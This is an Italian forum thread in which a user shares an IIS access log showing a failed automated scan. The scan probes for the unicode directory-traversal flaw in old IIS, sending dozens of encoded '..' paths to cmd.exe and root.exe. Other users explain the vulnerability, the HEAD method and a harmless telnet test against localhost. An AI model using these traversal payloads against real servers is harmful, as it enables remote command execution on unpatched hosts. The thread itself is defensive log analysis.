Sono stato attaccato!!

[FreeSoul]

... ma a guardare il log non ha avuto fortuna

12:23:13 82.51.50.114 HEAD /Default.htm 200
12:23:14 82.51.50.114 HEAD /MSADC/root.exe 404
12:23:15 82.51.50.114 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
12:23:15 82.51.50.114 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
12:23:17 82.51.50.114 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
12:23:19 82.51.50.114 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
12:23:20 82.51.50.114 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
12:23:21 82.51.50.114 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
12:23:22 82.51.50.114 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
12:23:23 82.51.50.114 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
12:23:24 82.51.50.114 HEAD /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
12:23:25 82.51.50.114 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
12:23:27 82.51.50.114 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
12:23:28 82.51.50.114 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
12:23:29 82.51.50.114 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
12:23:31 82.51.50.114 HEAD /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
12:23:32 82.51.50.114 HEAD /winnt/system32/cmd.exe 404
12:23:33 82.51.50.114 HEAD /winnt/system32/cmd.exe 404
12:23:34 82.51.50.114 HEAD /_vti_cnf/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
12:23:35 82.51.50.114 HEAD /winnt/system32/cmd.exe 404
12:23:37 82.51.50.114 HEAD /adsamples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
12:23:38 82.51.50.114 HEAD /winnt/system32/cmd.exe 404
12:23:40 82.51.50.114 HEAD /c/winnt/system32/cmd.exe 404
12:23:41 82.51.50.114 HEAD /cgi-bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
12:23:41 82.51.50.114 HEAD /winnt/system32/cmd.exe 404
12:23:42 82.51.50.114 HEAD /d/winnt/system32/cmd.exe 404
12:23:42 82.51.50.114 HEAD /iisadmpwd/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
12:23:43 82.51.50.114 HEAD /winnt/system32/cmd.exe 404
12:23:43 82.51.50.114 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
12:23:45 82.51.50.114 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
12:23:45 82.51.50.114 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
12:23:46 82.51.50.114 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
12:23:46 82.51.50.114 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
12:23:47 82.51.50.114 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
12:23:47 82.51.50.114 HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
12:23:49 82.51.50.114 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
12:23:49 82.51.50.114 HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
12:23:50 82.51.50.114 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
12:23:50 82.51.50.114 HEAD /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe 404
12:23:51 82.51.50.114 HEAD /winnt/system32/cmd.exe 404
12:23:51 82.51.50.114 HEAD /msadc/..o../winnt/system32/cmd.exe 404
12:23:52 82.51.50.114 HEAD /msadc/..Á%pc../..Á%pc../..Á%pc../winnt/system32/cmd.exe 404
12:23:52 82.51.50.114 HEAD /msadc/..Á%pc../winnt/system32/cmd.exe 404
12:23:53 82.51.50.114 HEAD /winnt/system32/cmd.exe 404
12:23:53 82.51.50.114 HEAD /winnt/system32/cmd.exe 404
12:23:53 82.51.50.114 HEAD /msadc/..ð€€¯../..ð€€¯../..ð€€¯../winnt/system32/cmd.exe 404
12:23:55 82.51.50.114 HEAD /msadc/..ð€€¯../winnt/system32/cmd.exe 404
12:23:55 82.51.50.114 HEAD /msadc/..ø€€€¯../..ø€€€¯../..ø€€€¯../winnt/system32/cmd.exe 404
12:23:56 82.51.50.114 HEAD /msadc/..ø€€€¯../winnt/system32/cmd.exe 404
12:23:56 82.51.50.114 HEAD /samples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
12:23:56 82.51.50.114 HEAD /winnt/system32/cmd.exe 404
12:23:57 82.51.50.114 HEAD /winnt/system32/cmd.exe 404
12:23:57 82.51.50.114 HEAD /scripts/.%2e/.%2e/winnt/system32/cmd.exe 404
12:23:58 82.51.50.114 HEAD /scripts/..%5c../winnt/system32/cmd.exe 404
12:23:58 82.51.50.114 HEAD /scripts/..%5c../winnt/system32/cmd.exe 404
12:23:58 82.51.50.114 HEAD /scripts/..%5c../winnt/system32/cmd.exe 404
12:24:00 82.51.50.114 HEAD /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
12:24:00 82.51.50.114 HEAD /scripts/..%2f../winnt/system32/cmd.exe 404
12:24:00 82.51.50.114 HEAD /scripts/..%5c%5c../winnt/system32/cmd.exe 404
12:24:01 82.51.50.114 HEAD /scripts/..%5c..%5cwinnt/system32/cmd.exe 404
12:24:01 82.51.50.114 HEAD /scripts/..%5c../winnt/system32/cmd.exe 404
12:24:01 82.51.50.114 HEAD /winnt/system32/cmd.exe 404
12:24:02 82.51.50.114 HEAD /scripts/..Á..Á..Á..Áwinnt/system32/cmd.exe 404
12:24:02 82.51.50.114 HEAD /winnt/system32/cmd.exe 404
12:24:02 82.51.50.114 HEAD /scripts/..À%9v../winnt/system32/cmd.exe 404
12:24:03 82.51.50.114 HEAD /winnt/system32/cmd.exe 404
12:24:03 82.51.50.114 HEAD /scripts/..À%qf../winnt/system32/cmd.exe 404
12:24:03 82.51.50.114 HEAD /scripts/..Á../winnt/system32/cmd.exe 404
12:24:05 82.51.50.114 HEAD /scripts/..Á%8s../winnt/system32/cmd.exe 404
12:24:05 82.51.50.114 HEAD /winnt/system32/cmd.exe 404
12:24:05 82.51.50.114 HEAD /scripts/..o../winnt/system32/cmd.exe 404
12:24:06 82.51.50.114 HEAD /scripts/..Á%pc../winnt/system32/cmd.exe 404
12:24:06 82.51.50.114 HEAD /winnt/system32/cmd.exe 404
12:24:06 82.51.50.114 HEAD /scripts/..ð€€¯../winnt/system32/cmd.exe 404
12:24:07 82.51.50.114 HEAD /scripts/..ø€€€¯../winnt/system32/cmd.exe 404
12:24:07 82.51.50.114 HEAD /scripts/..ü€€€€¯../winnt/system32/cmd.exe 404
12:24:08 82.51.50.114 HEAD /scripts/root.exe 404
12:24:08 82.51.50.114 HEAD /msadc/..ü€€€€¯../..ü€€€€¯../..ü€€€€¯../winnt/system32/cmd.exe 404

Ma è un software che manda tutti questi attacchi? Guardate l'orario.

Che cos'è un accesso HEAD? Vorrei saperne di più.

[Habanero]

Si è un attacco e non ha avuto successo perchè il server ha risposto sempre con il codice 404 (not found).
La vulnerabilità cercata prende il nome di "directory traversal using unicode". IIS non patchato permette di navigare attraverso le cartelle del sistema al di fuori di quelle del webserver tramite alcune codifiche unicode dei caratteri "..\" che permettono di risalire di un livello nella gerarchia delle cartelle. In questo modo si riusciva a bypassare il controllo del server che in teoria non doveva permettere di accedere a tali cartelle e così forzare l'esecusione del comando cmd.exe nella cartella \winnt\ di windows 2000 e quindi provocare una esecuzione di codice remoto.
Esistono appositi programmini scritti spesso in Perl che consentono di testare tale vulnerabilità.

HEAD è uno dei metodi del protocollo HTTP. In genere per richiedere una pagina si usa GET che ritorna sia gli header sia il contenuto della pagina. Tramide HEAD si richiedono solo gli header in modo da velocizzare la scansione per la ricerca della vulnerabilità

[FreeSoul]

ma come si fa per richiedere gli HEAD.
Se io prendo una di quelle stringe e la lancio nuovamente sul mio IP, teoricamente mi dovrebbe tornare un GET. Giusto?

[billiejoex]

questi log da dove li hai presi ?

[FreeSoul]

dal mio pc
...
un'altra cosa: perchè il tempo va 2 ore indietro? Il mio orologio è esatto

[billiejoex]

si ma da dove? eventi wiever? i log del firewall?
cosa?

[FreeSoul]

è il log di IIS

[bibita]

www.iis.it scherzo eh

[Habanero]

Originariamente inviato da FreeSoul
ma come si fa per richiedere gli HEAD.
Se io prendo una di quelle stringe e la lancio nuovamente sul mio IP, teoricamente mi dovrebbe tornare un GET. Giusto?

Il protocollo HTTP è gestito in modo per te trasparente dal browser (lato client) e nel tuo caso da IIS per il server.

Quando un browser richiede una pagina si collega alla porta 80 del server e manda dei comandi. In generale fa una richiesta GET per ottenere il codice HTML della pagina. Il server gli manderà prima gli header e subito dopo il codice della pagina. A questo punto il browser visualizzarà la pagina interpretando il codice ricevuto.

Se un client http fa una richiesta HEAD invece che GET riceverà dal server solo gli header.

Se vuoi fare una prova, apri il prompt del dos e digita

codice:

telnet localhost 80

e poi senza fare errori perchè non puoi usare il backspace digita esattamente:

codice:

GET / HTTP/1.1
host: localhost
connection: close

dopo "close" premi due volte invio... come per magia ti comparirà il codice html della tua homepage.

se sostituisci HEAD alla parola GET ottieni solo gli header

[FreeSoul]

tutto chiaro
quindi il programma che è stato utilizzato può essere tranquillamente un .BAT

ora faccio la prova con il mio IIS